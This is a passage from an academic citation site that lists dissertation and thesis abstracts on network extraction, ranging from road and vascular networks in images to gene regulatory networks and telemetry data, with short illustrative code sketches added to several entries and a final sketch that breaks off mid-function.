Dissertations / Theses on the topic 'Network extraction'


Create a spot-on reference in APA, MLA, Chicago, Harvard, and other styles


Consult the top 50 dissertations / theses for your research on the topic 'Network extraction.'

Next to every source in the list of references, there is an 'Add to bibliography' button. Click it, and we will automatically generate the bibliographic reference to the chosen work in the citation style you need: APA, MLA, Harvard, Chicago, Vancouver, etc.

You can also download the full text of the academic publication as a PDF and read its abstract online, whenever these are available in the metadata.

Browse dissertations / theses from a wide variety of disciplines and organise your bibliography correctly.

1

McEnnis, Daniel. "On-demand metadata extraction network (OMEN)." Thesis, McGill University, 2006. http://digitool.Library.McGill.CA:80/R/?func=dbin-jump-full&object_id=99382.

Full text
Abstract:
OMEN (On-demand Metadata Extraction Network) addresses a fundamental problem in Music Information Retrieval: the lack of universal access to a large dataset containing significant amounts of copyrighted music. This thesis proposes a solution to this problem that is accomplished by utilizing the large collections of digitized music available at many libraries. Using OMEN, libraries will be able to perform on-demand feature extraction on site, returning feature values to researchers instead of providing direct access to the recordings themselves. This avoids copyright difficulties, since the underlying music never leaves the library that owns it. The analysis is performed using grid-style computation on library machines that are otherwise under-used (e.g., devoted to patron web and catalogue use).
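To make the architecture concrete, here is a minimal, hedged sketch of a library-side routine of the kind OMEN describes: the audio is analysed on site and only derived feature values are returned, so the copyrighted recording never leaves the institution. The feature names, the request format and the `load_audio` helper are hypothetical, not OMEN's actual interface.

```python
import numpy as np

def extract_features(audio: np.ndarray, sr: int) -> dict:
    """Compute a few simple frame-level descriptors and return summaries."""
    frame, hop = 2048, 1024
    frames = [audio[i:i + frame] for i in range(0, len(audio) - frame, hop)]
    spectra = [np.abs(np.fft.rfft(f * np.hanning(frame))) for f in frames]
    freqs = np.fft.rfftfreq(frame, d=1.0 / sr)
    centroids = [float(np.sum(freqs * s) / (np.sum(s) + 1e-12)) for s in spectra]
    rms = [float(np.sqrt(np.mean(f ** 2))) for f in frames]
    return {
        "spectral_centroid_mean": float(np.mean(centroids)),
        "spectral_centroid_std": float(np.std(centroids)),
        "rms_mean": float(np.mean(rms)),
    }

def handle_request(recording_id: str, load_audio) -> dict:
    """Run extraction on site; only the feature dictionary leaves the library."""
    audio, sr = load_audio(recording_id)   # the recording stays inside the library
    return extract_features(audio, sr)
```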
APA, Harvard, Vancouver, ISO, and other styles
2

El Ghoul, Aymen. "Phase fields for network extraction from images." Nice, 2010. http://www.theses.fr/2010NICE4075.

Full text
Abstract:
This thesis describes the construction of an undirected network (e.g. road network) model, based on the recently developed higher-order active contours (HOACs) and phase fields, and introduces a new family of phase field HOACs for directed networks (e.g. hydrographic networks in remote sensing imagery, vascular networks in medical imagery). In the first part of this thesis, we focus on the stability analysis of a HOAC energy, leading to a "phase diagram". The results, which are confirmed by numerical experiments, enable the selection of parameter values for the modelling of undirected networks. Hydrographic networks, unlike road networks, are directed, i.e. they carry a unidirectional flow in each branch. This leads to specific geometric properties of the branches, and particularly of the junctions, that it is useful to capture in a model for network extraction purposes. We thus develop a nonlocal phase field model of directed networks which, in addition to a scalar field representing a region by its smoothed characteristic function and interacting nonlocally so as to favour network configurations, contains a vector field representing the "flow" through the network branches. The vector field is strongly encouraged to be zero outside the network and of unit magnitude inside it; to run along the network branches; and to have very low divergence. This prolongs network branches, controls width variation along a branch, and produces asymmetric junctions for which total incoming branch width approximately equals total outgoing branch width. The new model is applied to the problem of hydrographic network extraction from very high resolution satellite images, where it outperforms the undirected network model.
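To make the constraints on the vector field concrete, the display below is only a schematic of the kind of penalty terms such a directed-network phase field energy combines; the coefficients and exact functional forms are illustrative, not those of the thesis:

```latex
E(\phi, v) \;=\; E_{\mathrm{HOAC}}(\phi)
  \;+\; \lambda_1 \int \bigl(\lvert v \rvert^{2} - \tilde{\phi}\bigr)^{2}\,dx
  \;+\; \lambda_2 \int \bigl(v \cdot \nabla \tilde{\phi}\bigr)^{2}\,dx
  \;+\; \lambda_3 \int \bigl(\nabla \cdot v\bigr)^{2}\,dx
```

Here \tilde{\phi} is the smoothed characteristic function of the region (close to 1 inside the network, 0 outside), so the first term pushes |v| towards 1 inside and 0 outside, the second encourages v to run along branches rather than across them, and the divergence term expresses the approximate conservation of width at junctions.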
APA, Harvard, Vancouver, ISO, and other styles
3

Swanepoel, Lodewyk. "Network simulation for the effective extraction of IP network statistics / Lodewyk Swanepoel." Thesis, North-West University, 2003. http://hdl.handle.net/10394/231.

Full text
Abstract:
This study investigates the extent to which a communication session's QoS parameters can be measured by extracting only TCP/IP header data. The effect on these measurements of the point of header extraction, both within the network and within the OSI stack, is also investigated. An overview of packet-switched networks and packet-switched network protocols is given, together with the advantages and disadvantages of different network architectures and protocols. Different network simulation tools are discussed and compared to find the most appropriate simulation tool for this study. Two network topologies are introduced, and sessions are constructed and monitored using only the TCP/IP header data. Sessions are established and maintained, the results obtained from these sessions are compared, and the most appropriate solution is chosen. The results show that extracting data at the edge routers is the optimal solution for these sessions. The sessions are established and maintained using virtual private network technologies and protocols.
Thesis (M.Ing.)--North-West University, Potchefstroom Campus, 2004.
APA, Harvard, Vancouver, ISO, and other styles
4

Kushmerick, Nicholas. "Wrapper induction for information extraction /." Thesis, Connect to this title online; UW restricted, 1997. http://hdl.handle.net/1773/6867.

Full text
APA, Harvard, Vancouver, ISO, and other styles
5

Tong, Dong Ling. "Genetic algorithm-neural network : feature extraction for bioinformatics data." Thesis, Bournemouth University, 2010. http://eprints.bournemouth.ac.uk/15788/.

Full text
Abstract:
With the advance of gene expression data in the bioinformatics field, the questions which frequently arise, for both computer and medical scientists, are which genes are significantly involved in discriminating cancer classes and which genes are significant with respect to a specific cancer pathology. Numerous computational analysis models have been developed to identify informative genes from microarray data; however, the integrity of the reported genes is still uncertain. This is mainly due to misconceptions about the objectives of microarray studies. Furthermore, the application of various preprocessing techniques to microarray data has jeopardised its quality. As a result, the integrity of the findings has been compromised by the improper use of techniques and the ill-conceived objectives of the study. This research proposes an innovative hybridised model based on genetic algorithms (GAs) and artificial neural networks (ANNs) to extract the highly differentially expressed genes for a specific cancer pathology. The proposed method can efficiently extract the informative genes from the original data set, which reduces the gene variability errors incurred by the preprocessing techniques. The novelty of the research comes from two perspectives. Firstly, the research emphasises extracting informative features from a high-dimensional and highly complex data set, rather than improving classification results. Secondly, it uses an ANN to compute the fitness function of the GA, which is rare in the context of feature extraction. Two benchmark microarray data sets have been used to study the prominent genes expressed in tumour development, and the results show that the genes respond to different stages of tumourigenesis (i.e. different fitness precision levels), which may be useful for early malignancy detection. The extraction ability of the proposed model is validated against the expected results in synthetic data sets. In addition, two bioassay data sets have been used to examine the efficiency of the proposed model at extracting significant features from large, imbalanced bioassay data with multiple data representations.
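A minimal sketch of the kind of GA-ANN hybrid described above, assuming a gene-expression matrix X (samples x genes) and class labels y: the fitness of a candidate gene subset is the cross-validated accuracy of a small neural network trained on just those genes. Population size, mutation rate and network shape are illustrative choices, not the thesis's settings.

```python
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(0)

def fitness(mask, X, y):
    """Cross-validated accuracy of an ANN trained on the selected genes."""
    if mask.sum() == 0:
        return 0.0
    clf = MLPClassifier(hidden_layer_sizes=(16,), max_iter=500, random_state=0)
    return cross_val_score(clf, X[:, mask], y, cv=3).mean()

def ga_select(X, y, n_pop=20, n_gen=15, p_gene=0.05, p_mut=0.01):
    n_genes = X.shape[1]
    pop = rng.random((n_pop, n_genes)) < p_gene          # random gene subsets
    for _ in range(n_gen):
        scores = np.array([fitness(ind, X, y) for ind in pop])
        order = np.argsort(scores)[::-1]
        parents = pop[order[: n_pop // 2]]               # truncation selection
        children = []
        for _ in range(n_pop - len(parents)):
            a, b = parents[rng.integers(len(parents), size=2)]
            cut = rng.integers(1, n_genes)
            child = np.concatenate([a[:cut], b[cut:]])   # one-point crossover
            child ^= rng.random(n_genes) < p_mut         # bit-flip mutation
            children.append(child)
        pop = np.vstack([parents, children])
    best = max(pop, key=lambda ind: fitness(ind, X, y))
    return np.flatnonzero(best)                          # indices of selected genes
```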
APA, Harvard, Vancouver, ISO, and other styles
6

Seegmiller, Ray D., Greg C. Willden, Maria S. Araujo, Todd A. Newton, Ben A. Abbott, and William A. Malatesta. "Automation of Generalized Measurement Extraction from Telemetric Network Systems." International Foundation for Telemetering, 2012. http://hdl.handle.net/10150/581647.

Full text
Abstract:
ITC/USA 2012 Conference Proceedings / The Forty-Eighth Annual International Telemetering Conference and Technical Exhibition / October 22-25, 2012 / Town and Country Resort & Convention Center, San Diego, California
In telemetric network systems, data extraction is often an after-thought. The data description frequently changes throughout the program so that last minute modifications of the data extraction approach are often required. This paper presents an alternative approach in which automation of measurement extraction is supported. The central key is a formal declarative language that can be used to configure instrumentation devices as well as measurement extraction devices. The Metadata Description Language (MDL) defined by the integrated Network Enhanced Telemetry (iNET) program, augmented with a generalized measurement extraction approach, addresses this issue. This paper describes the TmNS Data Extractor Tool, as well as lessons learned from commercial systems, the iNET program and TMATS.
APA, Harvard, Vancouver, ISO, and other styles
7

Karaman, Ersin. "Road Network Extraction From High-resolution Multi-spectral Satellite Images." Phd thesis, METU, 2012. http://etd.lib.metu.edu.tr/upload/12615362/index.pdf.

Full text
Abstract:
In this thesis, an automatic road extraction algorithm for multi-spectral images is developed. The developed model extracts elongated structures from images by using edge detection, segmentation and clustering techniques. The study also extracts non-road regions such as vegetative fields, bare soil and water bodies to obtain a more accurate road map. The model is constructed in a modular approach that aims to extract roads with different characteristics, and the module outputs are combined to create a road score map. The developed algorithm is tested on 8-band WorldView-2 satellite images. It is observed that the proposed road extraction algorithm yields 47% precision and 70% recall. The approach is also tested on lower spectral resolution images with four bands, RGB and grey level, and it is observed that the additional four bands provide an improvement of 12% in precision and 3% in recall. Road type analysis is also within the scope of this study: roads are classified into asphalt, concrete and unpaved using Gaussian Mixture Models. Other linear objects such as railroads and water canals may also be extracted by this process. An algorithm that distinguishes drive roads from railroads in very high resolution images is also investigated; it is based on Fourier descriptors that identify the presence of railroad sleepers. Water canals are extracted in multi-spectral images using spectral ratios that employ the near-infrared bands, and structural properties are used to distinguish water canals from other water bodies in the image.
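A hedged illustration of the band-ratio step mentioned above: with a multi-spectral image stacked as a numpy array, vegetation and water can be masked with NDVI- and NDWI-style ratios before road scoring. The band indices and thresholds below are assumptions for WorldView-2-like data, not the thesis's actual parameters.

```python
import numpy as np

def non_road_masks(img, red=4, nir=6, green=2, ndvi_t=0.3, ndwi_t=0.2):
    """img: float array of shape (bands, rows, cols); returns boolean masks."""
    red_b, nir_b, green_b = img[red], img[nir], img[green]
    eps = 1e-6
    ndvi = (nir_b - red_b) / (nir_b + red_b + eps)       # high for vegetation
    ndwi = (green_b - nir_b) / (green_b + nir_b + eps)   # high for water
    return ndvi > ndvi_t, ndwi > ndwi_t

def road_score(edge_score, vegetation, water):
    """Suppress road evidence wherever a non-road class was detected."""
    score = edge_score.copy()
    score[vegetation | water] = 0.0
    return score
```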
APA, Harvard, Vancouver, ISO, and other styles
8

Kumuthini, Judit. "Extraction of genetic network from microarray data using Bayesian framework." Thesis, Cranfield University, 2007. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.442547.

Full text
APA, Harvard, Vancouver, ISO, and other styles
9

Wang, Wei. "Event Detection and Extraction from News Articles." Diss., Virginia Tech, 2018. http://hdl.handle.net/10919/82238.

Full text
Abstract:
Event extraction is a type of information extraction (IE) that extracts specific knowledge about incidents from texts. Nowadays the amount of available information (such as news, blogs, and social media) grows exponentially, so it becomes imperative to develop algorithms that automatically extract machine-readable information from large volumes of text data. In this dissertation, we focus on three problems in obtaining event-related information from news articles. (1) The first effort is to comprehensively analyze the performance of, and challenges in, current large-scale event encoding systems. (2) The second problem involves event detection and the extraction of critical information from news articles. (3) Third, the efforts concentrate on event encoding, which aims to extract event extent and arguments from texts. We start by investigating two large-scale event extraction systems (ICEWS and GDELT) in the political science domain. We design a set of experiments to evaluate the quality of the events extracted by the two target systems, in terms of reliability and correctness. The results show that there are significant discrepancies between the outputs of the automated systems and the hand-coded system, and that the accuracy of both systems is far from satisfactory. These findings provide preliminary background and set the foundation for using advanced machine learning algorithms for event-related information extraction. Inspired by the successful application of deep learning in Natural Language Processing (NLP), we propose a Multi-Instance Convolutional Neural Network (MI-CNN) model for event detection and critical-sentence extraction without sentence-level labels. To evaluate the model, we run a set of experiments on a real-world protest event dataset. The results show that our model outperforms strong baseline models and extracts meaningful key sentences without domain knowledge or manually designed features. We also extend the MI-CNN model and propose an MIMTRNN model for event extraction with distant supervision, to overcome the lack of fine-grained labels and the small size of the training data. The proposed MIMTRNN model systematically integrates RNNs, Multi-Instance Learning, and Multi-Task Learning into a unified framework. The RNN module encodes into the representation of entity mentions the sequential information as well as the dependencies between event arguments, which are very useful in the event extraction task. The Multi-Instance Learning paradigm means the system does not require precise labels at the entity-mention level, which makes it well suited to work with distant supervision for event extraction. The Multi-Task Learning module in our approach is designed to alleviate the potential overfitting problem caused by the relatively small training data. The results of experiments on two real-world datasets (Cyber-Attack and Civil Unrest) show that our model benefits from each component and significantly outperforms other baseline methods.
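A minimal sketch of the multi-instance idea described above, under the assumption that a news article is a bag of sentences and only an article-level label is available: each sentence is encoded by a small text CNN, and max-pooling over sentences yields the article score, so the most responsive sentences can be read off as key sentences. Layer sizes are illustrative, not those of MI-CNN.

```python
import torch
import torch.nn as nn

class MISentenceCNN(nn.Module):
    """Bag-level (article) classifier built from sentence-level CNN scores."""
    def __init__(self, vocab_size, emb_dim=100, n_filters=64, kernel=3):
        super().__init__()
        self.emb = nn.Embedding(vocab_size, emb_dim, padding_idx=0)
        self.conv = nn.Conv1d(emb_dim, n_filters, kernel_size=kernel, padding=1)
        self.score = nn.Linear(n_filters, 1)

    def forward(self, bag):
        # bag: LongTensor (n_sentences, max_tokens) of word ids for one article
        x = self.emb(bag).transpose(1, 2)        # (n_sent, emb, tokens)
        x = torch.relu(self.conv(x))             # (n_sent, filters, tokens)
        x = x.max(dim=2).values                  # max over tokens
        sent_scores = self.score(x).squeeze(1)   # one score per sentence
        article_score = sent_scores.max()        # multi-instance max pooling
        return article_score, sent_scores        # sent_scores rank key sentences
```

Training such a model would use a binary loss (e.g. BCEWithLogitsLoss) on the article score against the article-level label only.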
Ph. D.
APA, Harvard, Vancouver, ISO, and other styles
10

Bródka, Piotr. "Key User Extraction Based on Telecommunication Data." Thesis, Blekinge Tekniska Högskola, Sektionen för datavetenskap och kommunikation, 2012. http://urn.kb.se/resolve?urn=urn:nbn:se:bth-5863.

Full text
Abstract:
The number of systems that collect vast amounts of data about users has grown rapidly during the last few years. Many of these systems contain data not only about people's characteristics but also about their relationships with other system users. From this kind of data it is possible to extract a social network that reflects the connections between the system's users. Moreover, the analysis of such a social network makes it possible to investigate different characteristics of its users and their linkages. One type of such analysis is key user extraction. Key users are those who have the biggest impact on other network users as well as a big influence on network evolution. Knowledge about these users makes it possible to investigate and predict changes within the network, so it is very important for the people or companies who make a profit from the network, such as a telecommunication company. The second important issue is the ability to extract these users as quickly as possible, i.e. to develop an algorithm that is time-efficient in large social networks where the numbers of nodes and edges reach a few million.
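As a minimal, hedged illustration of extracting candidate key users from telecommunication data: build a social graph from call-detail records and rank users by a simple measure such as weighted degree, which can be computed in time linear in the number of records. The field names are hypothetical, and real key-user extraction would combine several measures.

```python
from collections import Counter, defaultdict

def weighted_degree(call_records):
    """call_records: iterable of (caller_id, callee_id, n_calls) tuples."""
    degree = Counter()
    neighbours = defaultdict(set)
    for caller, callee, n_calls in call_records:
        degree[caller] += n_calls
        degree[callee] += n_calls
        neighbours[caller].add(callee)
        neighbours[callee].add(caller)
    return degree, neighbours

records = [("A", "B", 12), ("A", "C", 3), ("B", "C", 7), ("D", "A", 1)]
degree, neighbours = weighted_degree(records)
top_users = [u for u, _ in degree.most_common(2)]   # candidate key users
print(top_users)
```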
APA, Harvard, Vancouver, ISO, and other styles
11

Lord, Dale, and Kurt Kosbar. "An Architecture for Sensor Data Fusion to Reduce Data Transmission Bandwidth." International Foundation for Telemetering, 2004. http://hdl.handle.net/10150/605790.

Full text
Abstract:
International Telemetering Conference Proceedings / October 18-21, 2004 / Town & Country Resort, San Diego, California
Sensor networks can demand large amounts of bandwidth if the raw sensor data is transferred to a central location. Feature recognition and sensor fusion algorithms can reduce this bandwidth. Unfortunately the designers of the system, having not yet seen the data which will be collected, may not know which algorithms should be used at the time the system is first installed. This paper describes a flexible architecture which allows the deployment of data reduction algorithms throughout the network while the system is in service. The network of sensors approach not only allows for signal processing to be pushed closer to the sensor, but helps accommodate extensions to the system in a very efficient and structured manner.
APA, Harvard, Vancouver, ISO, and other styles
12

Howes, Peter John. "Analysis of neural network mapping functions : generating evidential support." Thesis, Oxford Brookes University, 1999. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.287718.

Full text
APA, Harvard, Vancouver, ISO, and other styles
13

Wang, Chen. "From network to pathway: integrative network analysis of genomic data." Diss., Virginia Tech, 2011. http://hdl.handle.net/10919/77121.

Full text
Abstract:
The advent of various types of high-throughput genomic data has enabled researchers to investigate complex biological systems in a systematic way and has started to shed light on the underlying molecular mechanisms of cancers. To analyze huge amounts of genomic data, effective statistical and machine learning tools are clearly needed; more importantly, integrative approaches are especially needed to combine different types of genomic data for a network or pathway view of biological systems. Motivated by such needs, this dissertation develops an integrative framework for pathway analysis. Specifically, we dissect the molecular pathway into two parts: the protein-DNA interaction network and the protein-protein interaction network. Several novel approaches are proposed to integrate gene expression data with various forms of biological knowledge, such as protein-DNA interactions and protein-protein interactions, for reliable molecular network identification. The first part of this dissertation seeks to infer condition-specific transcriptional regulatory networks by integrating gene expression data and protein-DNA binding information. Protein-DNA binding information provides initial relationships between transcription factors (TFs) and their target genes, and this information is essential for deriving biologically meaningful integrative algorithms. Based on the availability of this information, we discuss the inference task in two different situations. (a) If protein-DNA binding information for multiple TFs is available: from the protein-DNA data of multiple TFs, derived from sequence analysis between DNA motifs and gene promoter regions, we can construct an initial connection matrix and solve the network inference using a constrained least-squares approach named motif-guided network component analysis (mNCA). However, the connection matrix usually contains a considerable number of false positives and false negatives that make inference results questionable. To circumvent this problem, we propose a knowledge-based stability analysis (kSA) approach to test the conditional relevance of individual TFs, by checking the discrepancy between multiple estimations of transcription factor activity with respect to different perturbations of the connections. The rationale behind stability analysis is that the consistency of observed gene expression and true network connections should remain stable after small perturbations are applied to the initial connection matrix. With condition-specific TFs prioritized by kSA, we further propose to use multivariate regression to highlight condition-specific target genes. Through simulation studies comparing with several competing methods, we show that the proposed schemes are more sensitive in detecting relevant TFs and target genes for network inference. Experimentally, we have applied stability analysis to a yeast cell cycle experiment and to a series of anti-estrogen breast cancer studies. In both experiments, not only are biologically relevant regulators highlighted, but condition-specific transcriptional regulatory networks are also constructed, which could provide further insight into the corresponding cellular mechanisms. (b) If only a single TF's protein-DNA information is available: this happens when the protein-DNA binding relationships of an individual TF are measured through experiments. Since the original mNCA requires a complete connection matrix to perform estimation, incomplete knowledge of a single TF cannot be used with that approach.
Moreover, binding information derived from experiments can still be inconsistent with gene expression levels. To overcome these limitations, we propose a linear extraction scheme called regulatory component analysis (RCA), which can infer underlying regulation relationships even with partial biological knowledge. Numerical simulations show a significant improvement of RCA over traditional methods in identifying target genes, not only in low signal-to-noise-ratio situations but also when the given biological knowledge is incomplete and inconsistent with the data. Furthermore, biological experiments on Escherichia coli regulatory network inference are performed to fairly compare traditional methods, and the effectiveness and superior performance of RCA are confirmed. The second part of the dissertation moves from the protein-DNA interaction network up to the protein-protein interaction network, to identify dys-regulated protein sub-networks by integrating gene expression data and protein-protein interaction information. Specifically, we propose a statistically principled method, namely Metropolis random walk on graph (MRWOG), to highlight condition-specific PPI sub-networks in a probabilistic way. The method is based on Markov chain Monte Carlo (MCMC) theory to generate a series of samples that eventually converge to a desired equilibrium distribution, where each sample indicates the selection of one particular sub-network during the Metropolis random walk. The central idea of MRWOG is that the essentiality of including a gene in a sub-network depends not only on its expression but also on its topological importance. In contrast to most existing methods, which construct sub-networks in a deterministic way and therefore lack a relevance score for each protein, MRWOG is capable of assessing the importance of each individual protein node in a global way, reflecting not only its individual association with clinical outcome but also its topological role (hub, bridge) in connecting other important proteins. Moreover, each protein node is associated with a sampling frequency score, which enables the statistical justification of each individual node and flexible scaling of sub-network results. Based on the MRWOG approach, we further propose two strategies: one is bootstrapping, used for assessing the statistical confidence of detected sub-networks; the other is graph division, to separate a large sub-network into several smaller sub-networks and facilitate interpretation. MRWOG is easy to use, with only two parameters to adjust: the beta value for performing the random walk and the quantile level for calculating the truncated posterior mean. Through extensive simulations, we show that the proposed scheme is not sensitive to these two parameters over a relatively wide range. We also compare MRWOG with deterministic approaches for identifying sub-networks and prioritizing topologically important proteins; in both cases MRWOG outperforms existing methods in terms of both precision and recall. By utilizing the MRWOG-generated node/edge sampling frequencies, which are in fact posterior means of the corresponding protein nodes/interaction edges, we illustrate that condition-specific nodes/interactions can be prioritized better than with schemes based on scores of individual nodes/interactions.
Experimentally, we have applied MRWOG to a yeast knockout experiment for galactose utilization pathways, to reveal important components of the corresponding biological functions; we have also applied MRWOG to breast cancer patient prognosis problems, where the sub-network analysis could lead to an understanding of the molecular mechanisms of antiestrogen resistance in breast cancer. Finally, we conclude this dissertation with a summary of the original contributions and the future work for deepening the theoretical justification of the proposed methods and broadening their potential biological applications, such as cancer studies.
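A hedged sketch of the constrained least-squares idea behind network-component-analysis-style inference, as described in part (a) above: given expression data X (genes x samples) and a binary prior connection matrix Z (genes x TFs), alternately estimate TF activities and connection strengths while forcing the zero entries of Z to stay zero. This is only an illustration of the principle, not the thesis's mNCA or kSA implementation.

```python
import numpy as np

def masked_nca(X, Z, n_iter=50, seed=0):
    """X: (n_genes, n_samples) expression; Z: (n_genes, n_tfs) 0/1 prior.
    Returns A (connection strengths, zero where Z == 0) and S (TF activities)."""
    rng = np.random.default_rng(seed)
    n_genes, _ = X.shape
    n_tfs = Z.shape[1]
    A = Z * rng.standard_normal((n_genes, n_tfs))
    S = rng.standard_normal((n_tfs, X.shape[1]))
    for _ in range(n_iter):
        # 1) TF activities given connections: least squares for S in X ~ A S.
        S, *_ = np.linalg.lstsq(A, X, rcond=None)
        # 2) Connection strengths given activities, gene by gene, restricted to
        #    the TFs allowed by the prior (the mask enforces the zero pattern).
        for g in range(n_genes):
            idx = np.flatnonzero(Z[g])
            if idx.size:
                coef, *_ = np.linalg.lstsq(S[idx].T, X[g], rcond=None)
                A[g, :] = 0.0
                A[g, idx] = coef
    return A, S
```

The kSA step described in the abstract would then perturb Z, re-run this kind of estimation, and measure how stable each TF's estimated activity remains.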
Ph. D.
APA, Harvard, Vancouver, ISO, and other styles
14

Linåker, Fredrik. "Prototype Extraction and Learning Using Prototypes in an Artificial Neural Network." Thesis, University of Skövde, Department of Computer Science, 1997. http://urn.kb.se/resolve?urn=urn:nbn:se:his:diva-294.

Full text
Abstract:

A prototype is a general description which depicts what an entire set of exemplars, belonging to a certain category, looks like. We investigate how prototypes, in the form of mathematical averages of a category's exemplar vectors, can be represented, extracted, accessed, and used for learning in an Artificial Neural Network (ANN). From the method by which an ANN classifies exemplars into categories, we conclude that prototype access (the production of an extracted prototype) can be performed using a very simple architecture. We go on to show how the architecture can be used for prototype extraction by simply exploiting how the back-propagation learning rule handles one-to-many mappings. We note that no extensions to the classification training sets are needed as long as they conform to certain restrictions. We then go on to show how the extracted prototypes can be used for the learning of new categories which are compositions of existing categories and we show how this can lead to reduced training sets and ultimately reduced learning times. A number of restrictions are noted which have to be considered in order for this to work. For example, the exemplar representations must be systematic and the categories linearly separable. The results, and other properties of our network, are compared with other architectures which also use some kind of prototype concept. Our conclusion is that prototype extraction and learning using prototypes is possible using a simple ANN architecture. Finally, we relate our system to the symbol grounding problem and point out some directions for future work.

APA, Harvard, Vancouver, ISO, and other styles
15

Kara, Kerim. "A 3-d Vascular Connectivity Tracking And Vascular Network Extraction Toolkit." Master's thesis, METU, 2011. http://etd.lib.metu.edu.tr/upload/12613201/index.pdf.

Full text
Abstract:
Angiography is an invasive procedure, since a contrast medium is injected into the patient's circulatory system, and the most commonly preferred technique is X-ray angiography. For diagnosis, treatment planning and risk assessment purposes, interventional radiologists rely on visual inspection to determine connectivity relations between vessels. This makes angiography even more invasive, since it requires additional injection of contrast medium and additional X-ray dose. This thesis presents a 3-D vascular connectivity tracking toolkit for automated extraction of vascular networks in 3-D medical images. The proposed method automatically extracts the vascular network connected to a user-defined point in a user-defined direction, and requires no further user interaction. The toolkit prevents additional injection of contrast agent and X-ray dose and saves time for the interventional radiologist. While the algorithm is applicable to all 3-D angiography images, the performance of the method is evaluated on a 3-D catheter angiography image of cerebrovascular structures. The algorithm iteratively tracks the gravity centers of vascular branches in the user-defined direction, preserving the connection to the user-defined point. Curvy branches are tracked even if they have discontinuous portions. Since this tracking method does not depend on lumen diameter or intensity differences, branches with stenoses and branches with large intensity differences can be successfully tracked. Skeletonization and junction detection methods, which are used to detect the sub-branches indirectly connected to the point, are also described. These methods are capable of handling bifurcations, trifurcations, and junctions with more branches. However, false junctions occurring due to superposition of vessels are not eliminated.
APA, Harvard, Vancouver, ISO, and other styles
16

Kyriakopoulos, Konstantinos G. "Wavelet analysis for compression and feature extraction of network performance measurements." Thesis, Loughborough University, 2008. https://dspace.lboro.ac.uk/2134/3558.

Full text
Abstract:
Monitored network data allows network managers and operators to gain valuable insight into the health and status of a network. Whilst such data is useful for real-time analysis, there is often a need to post-process historical network performance data. Storage of the monitored data then becomes a serious issue, as network monitoring activities generate significant quantities of data. This thesis is part of the EPSRC-sponsored MASTS (Measurements at All Scales in Time and Space) project. MASTS is a joint project between Loughborough, Cambridge and UCL and focuses on measuring, analyzing, compressing and storing network characteristics of JANET (the UK's research and academic network). The work in this thesis is motivated by the need to measure the performance of high-speed networks, and particularly of UKLight, which connects JANET to the USA and the rest of Europe. Such networks produce large amounts of data over long periods of time, making the storage of this information impractical. A possible solution to this problem is to use lossy compression in an on-line system that intelligently compresses computer network measurements while preserving the quality of important characteristics of the signal and various statistical properties. This thesis contributes to knowledge by examining two threshold estimation techniques, two threshold application techniques, and the impact of window size on lossy compression performance. In addition, eight different wavelets were examined in terms of compression performance, energy preservation, scaling behaviour, quality attributes (mean, standard deviation, visual quality and PSNR) and Long Range Dependence. Finally, this thesis contributes a technique for precise quality control of the reconstructed signal and an additional use of wavelets for detecting sudden changes. The results show that the proposed Gupta-Kaur (GK) based algorithm compresses delay signals on average 17 times and data-rate signals 11.2 times while accurately preserving their statistical properties.
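A brief, hedged sketch of wavelet-threshold compression of a measurement signal of the kind discussed above, using the PyWavelets package: decompose, zero out small detail coefficients, and reconstruct. The wavelet choice, decomposition level and threshold rule here are illustrative and are not the GK-based algorithm of the thesis.

```python
import numpy as np
import pywt

def compress(signal, wavelet="db4", level=4, keep=0.1):
    """Keep only the largest `keep` fraction of detail coefficients."""
    coeffs = pywt.wavedec(signal, wavelet, level=level)
    detail = np.concatenate(coeffs[1:])
    thresh = np.quantile(np.abs(detail), 1.0 - keep)     # magnitude cutoff
    return [coeffs[0]] + [pywt.threshold(c, thresh, mode="hard")
                          for c in coeffs[1:]]

def reconstruct(coeffs, wavelet="db4", length=None):
    rec = pywt.waverec(coeffs, wavelet)
    return rec[:length] if length is not None else rec

# Example: compress a noisy delay-like signal and check the reconstruction error.
t = np.linspace(0, 1, 1024)
delay = 20 + 5 * np.sin(2 * np.pi * 3 * t) + np.random.normal(0, 0.5, t.size)
rec = reconstruct(compress(delay), length=delay.size)
print("RMSE:", float(np.sqrt(np.mean((delay - rec) ** 2))))
```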
APA, Harvard, Vancouver, ISO, and other styles
17

Plahl, Christian [Verfasser]. "Neural network based feature extraction for speech and image recognition / Christian Plahl." Aachen : Hochschulbibliothek der Rheinisch-Westfälischen Technischen Hochschule Aachen, 2014. http://d-nb.info/1058851160/34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
18

Grote, Anne [Verfasser]. "Automatic road network extraction in suburban areas from aerial images / Anne Grote." Hannover : Technische Informationsbibliothek und Universitätsbibliothek Hannover (TIB), 2011. http://d-nb.info/1015469515/34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
19

Ozturk, Mahir. "Markov Random Field Based Road Network Extraction From High Resolution Satellite Images." Master's thesis, METU, 2013. http://etd.lib.metu.edu.tr/upload/12615499/index.pdf.

Full text
Abstract:
Road networks play an important role in various applications such as urban and rural planning, infrastructure planning, transportation management and vehicle navigation. Extraction of roads from remotely sensed satellite images for updating the road database in geographical information systems (GIS) is generally done manually by a human operator. However, manual extraction of roads is a time-consuming and labor-intensive process. In the existing literature, a great number of studies have been published with the purpose of automating the road extraction process; however, automated processes still yield erroneous and incomplete results, and human intervention is still required. The aim of this research is to propose a framework for road network extraction from high spatial resolution multi-spectral imagery (MSI) to improve the accuracy of road extraction systems. The proposed framework begins with a spectral classification using One-Class Support Vector Machine (SVM) and Gaussian Mixture Model (GMM) classifiers. Spectral classification exploits the spectral signature of road surfaces to classify road pixels. Then, an iterative template matching filter is proposed to refine the spectral classification results. A K-medians clustering algorithm is employed to detect candidate road centerline points. Final road network formation is achieved by Markov Random Fields. The extracted road network is evaluated against a reference dataset using a set of quality metrics.
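As a hedged illustration of the spectral-classification stage described above, the sketch below fits a one-class SVM to spectra sampled from known road pixels and then labels every pixel of a multi-spectral image. The kernel parameters and the way training pixels are chosen are assumptions, not the thesis's settings.

```python
import numpy as np
from sklearn.svm import OneClassSVM

def classify_road_pixels(img, road_samples, nu=0.1, gamma="scale"):
    """img: (bands, rows, cols) array; road_samples: (n, bands) road spectra."""
    bands, rows, cols = img.shape
    pixels = img.reshape(bands, -1).T                   # (rows*cols, bands)
    model = OneClassSVM(kernel="rbf", nu=nu, gamma=gamma).fit(road_samples)
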